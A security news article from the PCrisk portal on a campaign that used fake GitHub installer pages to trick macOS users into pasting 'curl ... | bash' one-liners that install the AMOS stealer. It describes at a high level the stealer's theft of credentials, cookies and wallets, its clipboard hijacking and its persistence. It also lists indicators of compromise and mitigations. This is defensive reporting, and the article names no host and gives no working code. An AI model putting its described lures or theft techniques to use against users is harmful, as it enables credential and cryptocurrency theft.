Fake GitHub Installers Used To Spread AMOS To macOS Users
Cybercriminals have increasingly weaponized trust: instead of exploiting zero-day flaws, they trick users into installing malicious software that impersonates legitimate apps. In a large-scale campaign observed by Malwarebytes in 2025, threat actors published convincing GitHub pages that posed as downloads for well-known macOS utilities, including Malwarebytes and LastPass.
The GitHub pages directed victims to run one-line terminal installers that fetched and executed remote scripts. Those installers bypassed normal review and download controls by using "curl ... | bash" style terminal commands, making the infection routine as simple as copying a command from a webpage and pressing Enter.
This vector distributed an information stealer known as AMOS, commonly also tracked as AtomicStealer or Atomic Stealer, and security teams rapidly flagged the technique as a major social-engineering threat to macOS users.
The impersonation was broad and systematic. Attackers created pages and search engine optimized listings that mimicked dozens of legitimate projects so that casual searches or paid ads could funnel victims to the malicious GitHub repos.
Once a victim followed the repository's "Get" instructions, the installation chain pulled a shell script from a recently registered domain and executed it, giving the attacker an immediate foothold.
Malwarebytes and other defenders emphasized that copying and running commands from untrusted pages, particularly those that pipe remote content directly to Bash, removes the user's last line of defense and enables stealthy delivery of stealers like AMOS.
Malwarebytes argues that these attacks should be considered dangerous for the following reasons:
- The attackers relied on brand recognition and developer reputations to lower suspicion; pages that appear under a GitHub domain or in search results often look authoritative to nontechnical users.
- The installation instructions deliberately used terminal commands that execute remotely downloaded scripts, which bypass many browser-level download protections and give attackers complete control.
That initial half of the attack chain, namely, convincing victims to self-install, is the most reliable part of the adversary's playbook. Researchers noted that blocking terminal commands, educating users against copying and executing terminal commands, and ensuring downloads come from vendor sites while using endpoint protections with web filtering significantly reduces the chance of an AMOS infection.
Malwarebytes and other vendors updated detections and web protections to intercept the malicious domains and flagged the GitHub pages as fraudulent.
Previous AMOS Campaigns and Malware Evolution
AMOS's rise to malware prominence did not happen overnight; security vendors traced a succession of macOS-focused campaigns through 2023 and 2024 that refined distribution tactics and capability sets. Historically, actors used cracked or pirated macOS apps and repackaged installers distributed through torrent sites and shady forums to lure victims.
Over time, the stealer evolved: multiple telemetry reports documented modules for harvesting browser cookies, saved credentials, crypto wallet data, and system information, the data a threat actor needs to monetize a compromised system illegally. Detection and incident response write-ups from security teams underscore that AMOS actors adapt quickly to defensive changes.
More recently, researchers observed a capability that dramatically increased the stealer's effectiveness: clipboard hijacking. By monitoring and replacing clipboard contents, AMOS can intercept cryptocurrency addresses copied by victims and substitute attacker-controlled addresses, a silent theft method that is hard for victims to spot. This shift illustrates the stealer's focus on high-value data extraction and covert monetization, especially against users handling crypto on macOS.
At a high level, AMOS operates as a multi-stage info stealer. The initial stage is typically a downloaded payload (often installed via an automated shell install or packaged with a cracked app) that establishes persistence on macOS by writing LaunchAgents or LaunchDaemons and, in some variants, a helper binary.
Once persistent, the stealer performs reconnaissance and data harvesting routines: enumeration of installed browsers, extraction of stored credentials and cookies, scanning for known wallet apps and their artifacts, and collection of system identifiers. Operators often combine exfiltration with periodic C2 polling and encrypted uploads to cloud-hosted storage or attacker-controlled endpoints.
Common indicators of compromise include:
- Standard persistence mechanisms include entries in ~/Library/LaunchAgents or Library/LaunchDaemons, and suspicious login items.
- Network indicators may include POSTs to recently registered domains or uploads to cloud storage services shortly after an install event; however, many operators use encryption and legitimate cloud providers to blend in.
The attackers' operational security complicates detection. Threat actors frequently update command-and-control (C2) infrastructure, scramble payload signatures, and obfuscate code. Using standard macOS command-line tools in install scripts, combined with the native feel of GitHub-hosted pages, reduces the number of noisy artifacts that traditional network-security tools would flag.
Modern endpoint detection is better placed to defend against AMOS infections as behavioral models, including monitoring abnormal persistence modifications, credential scraping behaviors, clipboard modification attempts, and unusual outbound flows, offer more protection than sole reliance on static signatures.
The convergence of social engineering, like fake vendor pages and ads, simple but powerful installer commands, and a capable info stealer, makes AMOS a persistent risk for macOS users.
The campaign's pivot to impersonating trusted brands like Malwarebytes and LastPass underscores the need for defensive hygiene: only trust vendor-hosted downloads, avoid running shell one-liners copied from search results, use reputable endpoint protections with web filtering, and monitor for the specific persistence and clipboard manipulation behaviors associated with AMOS.
As defenders update tooling and public awareness grows, the most effective mitigations will remain simple but effective: verify sources, scrutinize install commands, and treat unsolicited "helpful" installer snippets as potential attack vectors.
Share:
Facebook
X.com
LinkedIn
Copy Link
Karolis Liucveikis
Experienced software engineer, passionate about behavioral analysis of malicious apps
Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over 8 years working in this branch. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications.
PCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.
DonatePCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.
Donate
▼ Show Discussion